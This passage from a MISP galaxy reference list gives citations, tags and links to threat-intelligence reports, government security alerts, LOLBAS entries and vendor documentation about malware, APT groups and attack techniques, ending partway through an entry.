Application Bundle Manipulation Brandon Dalton

Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Application Bundle Manipulation Brandon Dalton"

Table 12459. Table References

Links

https://redcanary.com/blog/mac-application-bundles/

NCC Group Chimera January 2021

Jansen, W. (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021.

The tag is: misp-galaxy:references="NCC Group Chimera January 2021"

Table 12460. Table References

Links

https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/

Harmj0y Abusing GPO Permissions

Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Harmj0y Abusing GPO Permissions"

Table 12461. Table References

Links

http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

Retwin Directory Share Pivot

Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.

The tag is: misp-galaxy:references="Retwin Directory Share Pivot"

Table 12462. Table References

Links

https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html

BOHOPS Abusing the COM Registry

BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="BOHOPS Abusing the COM Registry"

Table 12463. Table References

Links

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

abusing_com_reg

bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="abusing_com_reg"

Table 12464. Table References

Links

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

Rhino Security Labs AWS VPC Traffic Mirroring

Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="Rhino Security Labs AWS VPC Traffic Mirroring"

Table 12465. Table References

Links

https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/

Narrator Accessibility Abuse

Comi, G. (2019, October 19). Abusing Windows 10 Narrator’s 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.

The tag is: misp-galaxy:references="Narrator Accessibility Abuse"

Table 12466. Table References

Links

https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html

Intezer ACBackdoor

Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Intezer ACBackdoor"

Table 12467. Table References

Links

https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/

AccCheckConsole.exe - LOLBAS Project

LOLBAS. (2022, January 2). AccCheckConsole.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="AccCheckConsole.exe - LOLBAS Project"

Table 12468. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/

CyberScoop APT28 Nov 2018

Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.

The tag is: misp-galaxy:references="CyberScoop APT28 Nov 2018"

Table 12469. Table References

Links

https://www.cyberscoop.com/apt28-brexit-phishing-accenture/

Microsoft Azure Kubernetes Service Service Accounts

Microsoft Azure. (2023, April 28). Access and identity options for Azure Kubernetes Service (AKS). Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Microsoft Azure Kubernetes Service Service Accounts"

Table 12470. Table References

Links

https://learn.microsoft.com/en-us/azure/aks/concepts-identity

CrowdStrike Access Brokers

CrowdStrike Intelligence Team. (2022, February 23). Access Brokers: Who Are the Targets, and What Are They Worth?. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="CrowdStrike Access Brokers"

Table 12471. Table References

Links

https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/

Microsoft Access Control Lists May 2018

M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.

The tag is: misp-galaxy:references="Microsoft Access Control Lists May 2018"

Table 12472. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists

Auth0 Access Tokens

Auth0. (n.d.). Access Tokens. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Auth0 Access Tokens"

Table 12473. Table References

Links

https://auth0.com/docs/tokens/access-tokens

BSidesSLC 2020 - LNK Elastic

French, D., Filar, B. (2020, March 21). A Chain Is No Stronger Than Its Weakest LNK. Retrieved November 30, 2020.

The tag is: misp-galaxy:references="BSidesSLC 2020 - LNK Elastic"

Table 12474. Table References

Links

https://www.youtube.com/watch?v=nJ0UsyiUEqQ

Mythic SpecterOps

Thomas, C. (2020, August 13). A Change of Mythic Proportions. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Mythic SpecterOps"

Table 12475. Table References

Links

https://posts.specterops.io/a-change-of-mythic-proportions-21debeb03617

FireEye Chinese Espionage October 2019

Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="FireEye Chinese Espionage October 2019"

Table 12476. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

Unit42 AcidBox June 2020

Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Unit42 AcidBox June 2020"

Table 12477. Table References

Links

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

acroread package compromised Arch Linux Mail 8JUL2018

Eli Schwartz. (2018, July 8). acroread package compromised. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="acroread package compromised Arch Linux Mail 8JUL2018"

Table 12478. Table References

Links

https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html

Microsoft Actinium February 2022

Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.

The tag is: misp-galaxy:references="Microsoft Actinium February 2022"

Table 12479. Table References

Links

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

Wikipedia Active Directory

Wikipedia. (2018, March 10). Active Directory. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Wikipedia Active Directory"

Table 12480. Table References

Links

https://en.wikipedia.org/wiki/Active_Directory

Microsoft AD Accounts

Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft AD Accounts"

Table 12481. Table References

Links

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts

Microsoft AD Admin Tier Model

Microsoft. (2019, February 14). Active Directory administrative tier model. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Microsoft AD Admin Tier Model"

Table 12482. Table References

Links

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN

Microsoft AD CS Overview

Microsoft. (2016, August 31). Active Directory Certificate Services Overview. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="Microsoft AD CS Overview"

Table 12483. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)

Microsoft Get-ADUser

Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Get-ADUser"

Table 12484. Table References

Links

https://technet.microsoft.com/library/ee617241.aspx

Active Directory Enumeration with LDIFDE

Microsoft. (2023, June 26). Active Directory Enumeration with LDIFDE. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="Active Directory Enumeration with LDIFDE"

Table 12485. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md#atomic-test-14---active-directory-enumeration-with-ldifde

Microsoft SID-History Attribute

Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft SID-History Attribute"

Table 12486. Table References

Links

https://msdn.microsoft.com/library/ms679833.aspx

ActiveMalwareEnergy

Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="ActiveMalwareEnergy"

Table 12487. Table References

Links

https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/

Klein Active Setup 2010

Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Klein Active Setup 2010"

Table 12488. Table References

Links

https://helgeklein.com/blog/2010/04/active-setup-explained/

Dark Vortex Brute Ratel C4

Dark Vortex. (n.d.). A Customized Command and Control Center for Red Team and Adversary Simulation. Retrieved February 7, 2023.

The tag is: misp-galaxy:references="Dark Vortex Brute Ratel C4"

Table 12489. Table References

Links

https://bruteratel.com/

ad_blocker_with_miner

Kuzmenko, A. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.

The tag is: misp-galaxy:references="ad_blocker_with_miner"

Table 12490. Table References

Links

https://securelist.com/ad-blocker-with-miner-included/101105/

Microsoft Support O365 Add Another Admin, October 2019

Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.

The tag is: misp-galaxy:references="Microsoft Support O365 Add Another Admin, October 2019"

Table 12491. Table References

Links

https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d

Amazon AWS IMDS V2

MacCarthaigh, C. (2019, November 19). Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service. Retrieved October 14, 2020.

The tag is: misp-galaxy:references="Amazon AWS IMDS V2"

Table 12492. Table References

Links

https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/

Adding Login Items

Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.

The tag is: misp-galaxy:references="Adding Login Items"

Table 12493. Table References

Links

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html

MRWLabs Office Persistence Add-ins

Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="MRWLabs Office Persistence Add-ins"

Table 12494. Table References

Links

https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/

AddinUtil.exe - LOLBAS Project

LOLBAS. (2023, October 5). AddinUtil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="AddinUtil.exe - LOLBAS Project"

Table 12495. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Addinutil/

Microsoft - Add-MailboxPermission

Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="Microsoft - Add-MailboxPermission"

Table 12496. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps

AddMonitor

Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="AddMonitor"

Table 12497. Table References

Links

http://msdn.microsoft.com/en-us/library/dd183341

Microsoft Azure AD Users

Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020.

The tag is: misp-galaxy:references="Microsoft Azure AD Users"

Table 12498. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory

Microsoft Office Add-ins

Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Microsoft Office Add-ins"

Table 12499. Table References

Links

https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460

Microsoft AddPrintProcessor May 2018

Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved October 5, 2020.

The tag is: misp-galaxy:references="Microsoft AddPrintProcessor May 2018"

Table 12500. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor

RFC1918

IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="RFC1918"

Table 12501. Table References

Links

https://tools.ietf.org/html/rfc1918

Microsoft Exchange Address Lists

Microsoft. (2020, February 7). Address lists in Exchange Server. Retrieved March 26, 2020.

The tag is: misp-galaxy:references="Microsoft Exchange Address Lists"

Table 12502. Table References

Links

https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019

Microsoft AD DS Getting Started

Foulds, I. et al. (2018, August 7). AD DS Getting Started. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Microsoft AD DS Getting Started"

Table 12503. Table References

Links

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started

Akamai DGA Mitigation

Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Akamai DGA Mitigation"

Table 12504. Table References

Links

https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html

Keychain Decryption Passware

Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="Keychain Decryption Passware"

Table 12505. Table References

Links

https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption

Trend Micro Deep Dive Into Defacement

Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Trend Micro Deep Dive Into Defacement"

Table 12506. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf

Talos Lokibot Jan 2021

Muhammad, I., Unterbrink, H. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.

The tag is: misp-galaxy:references="Talos Lokibot Jan 2021"

Table 12507. Table References

Links

https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html

Malwarebytes Saint Bot April 2021

Hasherezade. (2021, April 6). A deep dive into Saint Bot, a new downloader. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="Malwarebytes Saint Bot April 2021"

Table 12508. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/

SecurityScorecard CredoMap September 2022

Vlad Pasca. (2022, September 27). A Deep Dive Into the APT28’s stealer called CredoMap. Retrieved December 5, 2023.

The tag is: misp-galaxy:references="SecurityScorecard CredoMap September 2022"

Table 12509. Table References

Links

https://securityscorecard.com/research/apt28s-stealer-called-credomap/

Krebs DNS Hijack 2019

Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="Krebs DNS Hijack 2019"

Table 12510. Table References

Links

https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/

Reaqta MuddyWater November 2017

Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.

The tag is: misp-galaxy:references="Reaqta MuddyWater November 2017"

Table 12511. Table References

Links

https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/

ESET Turla PowerShell May 2019

Faou, M. and Dumont, R. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.

The tag is: misp-galaxy:references="ESET Turla PowerShell May 2019"

Table 12512. Table References

Links

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

Kubernetes Admission Controllers

Kubernetes. (n.d.). Admission Controllers Reference. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Kubernetes Admission Controllers"

Table 12513. Table References

Links

https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers

Krebs Adobe

Brian Krebs. (2013, October 3). Adobe To Announce Source Code, Customer Data Breach. Retrieved May 17, 2021.

The tag is: misp-galaxy:references="Krebs Adobe"

Table 12514. Table References

Links

https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/

Github AD-Pentest-Script

Twi1ight. (2015, July 11). AD-Pentest-Script - wmiexec.vbs. Retrieved June 29, 2017.

The tag is: misp-galaxy:references="Github AD-Pentest-Script"

Table 12515. Table References

Links

https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs

adplus.exe - LOLBAS Project

LOLBAS. (2021, September 1). adplus.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="adplus.exe - LOLBAS Project"

Table 12516. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/

Microsoft ADV170021 Dec 2017

Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.

The tag is: misp-galaxy:references="Microsoft ADV170021 Dec 2017"

Table 12517. Table References

Links

https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021

FireEye APT Groups

FireEye. (n.d.). Advanced Persistent Threat Groups. Retrieved August 3, 2018.

The tag is: misp-galaxy:references="FireEye APT Groups"

Table 12518. Table References

Links

https://www.fireeye.com/current-threats/apt-groups.html#apt19

Mandiant APT Groups List

Mandiant. (n.d.). Advanced Persistent Threats (APTs). Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Mandiant APT Groups List"

Table 12519. Table References

Links

https://www.mandiant.com/resources/insights/apt-groups

Advanced_sec_audit_policy_settings

Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="Advanced_sec_audit_policy_settings"

Table 12520. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings

CrowdStrike Richochet Chollima September 2021

CrowdStrike. (2021, September 30). Adversary Profile - Ricochet Chollima. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="CrowdStrike Richochet Chollima September 2021"

Table 12521. Table References

Links

https://www.crowdstrike.com/adversaries/ricochet-chollima/

Elastic - Hunting for Persistence Part 1

French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.

The tag is: misp-galaxy:references="Elastic - Hunting for Persistence Part 1"

Table 12522. Table References

Links

https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1

NCSC APT29 July 2020

National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.

The tag is: misp-galaxy:references="NCSC APT29 July 2020"

Table 12523. Table References

Links

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

Advpack.dll - LOLBAS Project

LOLBAS. (2018, May 25). Advpack.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Advpack.dll - LOLBAS Project"

Table 12524. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Advpack/

Kaspersky Adwind Feb 2016

Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Kaspersky Adwind Feb 2016"

Table 12525. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf

Bitdefender Trickbot VNC module Whitepaper 2021

Radu Tudorica. (2021, July 12). A Fresh Look at Trickbot’s Ever-Improving VNC Module. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Bitdefender Trickbot VNC module Whitepaper 2021"

Table 12526. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf

Mac Backdoors are back

Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Mac Backdoors are back"

Table 12527. Table References

Links

https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/

Kaspersky MSSQL Aug 2019

Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote attack on Microsoft SQL Server. Retrieved September 4, 2019.

The tag is: misp-galaxy:references="Kaspersky MSSQL Aug 2019"

Table 12528. Table References

Links

https://securelist.com/malicious-tasks-in-ms-sql-server/92167/

Securelist Agent.btz

Gostev, A. (2014, March 12). Agent.btz: a Source of Inspiration?. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="Securelist Agent.btz"

Table 12529. Table References

Links

https://securelist.com/agent-btz-a-source-of-inspiration/58551/

ThreatExpert Agent.btz

Shevchenko, S. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="ThreatExpert Agent.btz"

Table 12530. Table References

Links

http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html

AgentExecutor.exe - LOLBAS Project

LOLBAS. (2020, July 23). AgentExecutor.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="AgentExecutor.exe - LOLBAS Project"

Table 12531. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/

SentinelLabs Agent Tesla Aug 2020

Walter, J. (2020, August 10). Agent Tesla | Old RAT Uses New Tricks to Stay on Top. Retrieved December 11, 2020.

The tag is: misp-galaxy:references="SentinelLabs Agent Tesla Aug 2020"

Table 12532. Table References

Links

https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/

ATT Sidewinder January 2021

Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.

The tag is: misp-galaxy:references="ATT Sidewinder January 2021"

Table 12533. Table References

Links

https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

Harmj0y Domain Trusts

Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Harmj0y Domain Trusts"

Table 12534. Table References

Links

https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944

airwalk backdoor unix systems

airwalk. (2023, January 1). A guide to backdooring Unix systems. Retrieved May 31, 2023.

The tag is: misp-galaxy:references="airwalk backdoor unix systems"

Table 12535. Table References

Links

http://www.ouah.org/backdoors.html

Wired Lockergoga 2019

Greenberg, A. (2019, March 25). A Guide to LockerGoga, the Ransomware Crippling Industrial Firms. Retrieved July 17, 2019.

The tag is: misp-galaxy:references="Wired Lockergoga 2019"

Table 12536. Table References

Links

https://www.wired.com/story/lockergoga-ransomware-crippling-industrial-firms/

ZDNET Selling Data

Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="ZDNET Selling Data"

Table 12537. Table References

Links

https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/

ESET Zebrocy May 2019

ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.

The tag is: misp-galaxy:references="ESET Zebrocy May 2019"

Table 12538. Table References

Links

https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/

Microsoft AKS Azure AD 2023

Microsoft. (2023, February 27). AKS-managed Azure Active Directory integration. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Microsoft AKS Azure AD 2023"

Table 12539. Table References

Links

https://learn.microsoft.com/en-us/azure/aks/managed-aad

US-CERT SamSam 2018

US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="US-CERT SamSam 2018"

Table 12540. Table References

Links

https://www.us-cert.gov/ncas/alerts/AA18-337A

CISA MSS Sep 2020

CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020.

The tag is: misp-galaxy:references="CISA MSS Sep 2020"

Table 12541. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-258a

CISA Lokibot September 2020

DHS/CISA. (2020, September 22). Alert (AA20-266A) LokiBot Malware. Retrieved September 15, 2021.

The tag is: misp-galaxy:references="CISA Lokibot September 2020"

Table 12542. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-266a

CISA_AA21_200B

CISA. (2021, August 20). Alert (AA21-200B) Chinese State-Sponsored Cyber Operations: Observed TTPs. Retrieved June 21, 2022.

The tag is: misp-galaxy:references="CISA_AA21_200B"

Table 12543. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa21-200b

cisa_malware_orgs_ukraine

CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022.

The tag is: misp-galaxy:references="cisa_malware_orgs_ukraine"

Table 12544. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

US-CERT Ransomware 2016

US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="US-CERT Ransomware 2016"

Table 12545. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA16-091A

US-CERT WannaCry 2017

US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="US-CERT WannaCry 2017"

Table 12546. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-132A

US-CERT HIDDEN COBRA June 2017

US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="US-CERT HIDDEN COBRA June 2017"

Table 12547. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-164A

US-CERT NotPetya 2017

US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="US-CERT NotPetya 2017"

Table 12548. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-181A

US-CERT APT Energy Oct 2017

US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.

The tag is: misp-galaxy:references="US-CERT APT Energy Oct 2017"

Table 12549. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-293A

US-CERT FALLCHILL Nov 2017

US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="US-CERT FALLCHILL Nov 2017"

Table 12550. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-318A

US-CERT Volgmer Nov 2017

US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="US-CERT Volgmer Nov 2017"

Table 12551. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-318B

US-CERT TA18-074A

US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.

The tag is: misp-galaxy:references="US-CERT TA18-074A"

Table 12552. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-074A

US-CERT-TA18-106A

US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="US-CERT-TA18-106A"

Table 12553. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-106A

US-CERT Emotet Jul 2018

US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="US-CERT Emotet Jul 2018"

Table 12554. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-201A

AlKhaser Debug

Noteworthy. (2019, January 6). Al-Khaser. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="AlKhaser Debug"

Table 12555. Table References

Links

https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug

Fysbis Palo Alto Analysis

Bryan Lee and Rob Downs. (2016, February 12). A Look Into Fysbis: Sofacy’s Linux Backdoor. Retrieved September 10, 2017.

The tag is: misp-galaxy:references="Fysbis Palo Alto Analysis"

Table 12556. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/

Medium KONNI Jan 2020

Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.

The tag is: misp-galaxy:references="Medium KONNI Jan 2020"

Table 12557. Table References

Links

https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b

Unit 42 Palo Alto Ransomware in Public Clouds 2022

Jay Chen. (2022, May 16). A Look Into Public Clouds From the Ransomware Actor’s Perspective. Retrieved March 21, 2023.

The tag is: misp-galaxy:references="Unit 42 Palo Alto Ransomware in Public Clouds 2022"

Table 12558. Table References

Links

https://unit42.paloaltonetworks.com/ransomware-in-public-clouds/

Cyber Centre ALPHV/BlackCat July 25 2023

Canadian Centre for Cyber Security. (2023, July 25). ALPHV/BlackCat Ransomware Targeting of Canadian Industries. Retrieved September 13, 2023.

The tag is: misp-galaxy:references="Cyber Centre ALPHV/BlackCat July 25 2023"

Table 12559. Table References

Links

